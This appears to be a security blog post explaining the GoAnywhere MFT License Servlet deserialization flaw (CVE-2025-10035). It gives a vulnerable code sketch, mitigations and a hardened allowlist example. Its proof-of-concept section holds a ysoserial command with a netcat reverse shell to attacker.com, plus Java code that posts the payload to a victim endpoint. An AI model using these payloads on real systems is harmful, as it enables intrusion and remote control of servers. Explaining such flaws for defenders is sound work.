CVE-2025-10035 - GoAnywhere MFT License Servlet Deserialization Flaw — How It Works and Why It Matters

In early 2025, a serious vulnerability—CVE-2025-10035—was disclosed affecting Fortra’s GoAnywhere Managed File Transfer (MFT) solution. A bug in the License Servlet allows attackers to pass a *forged license signature* and get the Java app to blindly deserialize attacker-controlled objects, opening the door to remote command execution. Below, we walk through details of how this flaw works, including code snippets, technical explanation, exploit paths, and recommendations.

What Is GoAnywhere MFT?

GoAnywhere MFT is a popular managed file transfer solution used by enterprises to securely move sensitive data. It’s Java-based, with a web interface for admins, automation, and API endpoints—making it a juicy target for attackers.

The Core Problem: Deserialization in the License Servlet

The License Servlet is part of GoAnywhere’s process to validate user licenses. When an admin submits a license response, the system expects a signed payload, verifies it with a public key, and then deserializes it to read license info.

The flaw: If an attacker can forge a valid signature (for example, by obtaining the signing key, or via a signature validation bug), they can send crafted license payloads containing malicious Java objects. The vulnerable servlet will deserialize these objects *before* any safety checks, leading to arbitrary code execution under the application’s privileges.

Let’s simplify what the vulnerable flow in the License Servlet might look like:

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import javax.servlet.http.HttpServletRequest;

// Simplified illustration of the vulnerable flow; verifySignature() is assumed to live elsewhere in the app.
public void processLicenseResponse(HttpServletRequest req) throws IOException, ClassNotFoundException {
    byte[] licenseResponseBytes = req.getInputStream().readAllBytes();

    // Step 1: Verify the signature (potentially bypassed or forgeable)
    if (!verifySignature(licenseResponseBytes)) {
        throw new SecurityException("Invalid license signature!");
    }

    // Step 2: Deserialize the license object with no class filter at all
    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(licenseResponseBytes));
    Object licenseObj = ois.readObject();  // Vulnerability here: any class on the classpath can be instantiated
    // ... operate on licenseObj ...
}
```

Problem: If the attacker sends a serialized Java gadget chain (see ysoserial), it gets deserialized. If a gadget class on the classpath allows code execution, that code runs *immediately* during deserialization, before the application ever inspects the resulting object.

The attacker then submits this forged license response to the servlet.

If successful, the attacker’s payload will be deserialized, and any code in its readObject() method (or chained methods) will execute with *system* or *GoAnywhere app* privileges.

Proof of Concept Exploit

Let’s say the app uses commons-collections, a popular Java deserialization target. A simple exploit workflow would be:

Generate a malicious payload with ysoserial:

```sh
java -jar ysoserial.jar CommonsCollections1 'nc attacker.com 4444 -e /bin/sh' > shell.ser
```

Example of sending the payload from Java:

```java
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Paths;

// Example: using the ysoserial-generated byte[] payload (the shell.ser file written above)
byte[] gadgetBytes = Files.readAllBytes(Paths.get("shell.ser"));

HttpURLConnection conn = (HttpURLConnection) new URL("https://victim:800/goanywhere/license").openConnection();
conn.setDoOutput(true);
conn.setRequestMethod("POST");
conn.getOutputStream().write(gadgetBytes);
int response = conn.getResponseCode();
System.out.println("Response: " + response);
```

For a real-world attack, the attacker must find a way to produce the *valid signature* as expected by the application, which may require additional flaws.

Impact

- Remote Code Execution: This is as bad as it gets: system compromise, data exfiltration, lateral movement.

Mitigation

- *Patch ASAP!* Fortra will release updates (GoAnywhere Security Advisories).
- Block suspicious external access to management interfaces.
- Apply strict allowlisting on deserialization targets, or better—do not deserialize untrusted data.
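The allowlisting this last point calls for, applied to the servlet flow sketched earlier, as an added example that is not GoAnywhere’s or Fortra’s code: a hypothetical `HardenedLicenseReader` verifies a detached RSA signature over the raw bytes, then deserializes under a JEP 290 `ObjectInputFilter` that admits only a hypothetical `LicenseInfo` class, and type-checks the result. The detached-signature layout, the class names and the generated RSA key are assumptions, not the product’s real license format.

```java
import java.io.*;
import java.security.*;
import java.util.HashMap;
// Hypothetical license record: the only application class the filter admits.
final class LicenseInfo implements Serializable {
    final String licensee;
    final long expiresEpochSeconds;
    LicenseInfo(String licensee, long expires) { this.licensee = licensee; this.expiresEpochSeconds = expires; }
}
public class HardenedLicenseReader {
    // JEP 290 allowlist: LicenseInfo (and String) only, with a bounded object graph; every other class is rejected.
    private static final ObjectInputFilter LICENSE_FILTER = ObjectInputFilter.Config.createFilter(
            "LicenseInfo;java.lang.String;maxdepth=3;maxrefs=16;maxbytes=4096;!*");

    // 1) verify the detached signature over the raw bytes, 2) deserialize under the allowlist,
    // 3) type-check the result. A forged signature alone no longer reaches an arbitrary class.
    static LicenseInfo readLicense(byte[] body, byte[] sig, PublicKey key)
            throws IOException, GeneralSecurityException, ClassNotFoundException {
        Signature verifier = Signature.getInstance("SHA256withRSA");
        verifier.initVerify(key);
        verifier.update(body);
        if (!verifier.verify(sig)) throw new SecurityException("Invalid license signature");
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(body))) {
            ois.setObjectInputFilter(LICENSE_FILTER);
            Object obj = ois.readObject();  // throws InvalidClassException when the filter says REJECTED
            if (!(obj instanceof LicenseInfo)) throw new SecurityException("Unexpected payload type");
            return (LicenseInfo) obj;
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        KeyPair kp = KeyPairGenerator.getInstance("RSA").generateKeyPair();  // constructed demo key, not a real one
        Signature signer = Signature.getInstance("SHA256withRSA");
        signer.initSign(kp.getPrivate());
        byte[] good = serialize(new LicenseInfo("example-tenant", 4102444800L));
        signer.update(good);
        System.out.println("accepted: " + readLicense(good, signer.sign(), kp.getPublic()).licensee);
        // A plain HashMap stands in for any unexpected class; even with a valid signature the filter rejects it.
        byte[] unexpected = serialize(new HashMap<String, String>());
        signer.update(unexpected);
        try { readLicense(unexpected, signer.sign(), kp.getPublic()); }
        catch (InvalidClassException e) { System.out.println("rejected by filter: " + e.getMessage()); }
    }
}
```

The same filter can be applied process-wide with the `jdk.serialFilter` system property so that code paths you did not audit also get the allowlist.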

References and Further Reading

- Fortra GoAnywhere Security Advisories
- CVE-2025-10035 NVD Listing (pending as of writing)
- Understanding Java Deserialization Attacks
- ysoserial Java gadgets tool (for PoC and testing)

Closing Thoughts

Deserialization bugs like CVE-2025-10035 in enterprise file transfer solutions show the dangers of mixing serialized objects and user input—even when you try to “secure” them with signatures. If you use GoAnywhere MFT, treat all incoming updates as critical, restrict admin access, and patch without delay.

Remember: Never trust user-provided data—especially when Java ObjectInputStream is involved.


*If you’re responsible for GoAnywhere, prioritize this fix now. If you’re a defender, monitor for suspicious license activity and stay alert for post-exploitation signs. Stay safe!*

Timeline

Published on: 09/18/2025 22:15:41 UTC
Last modified on: 10/24/2025 13:44:10 UTC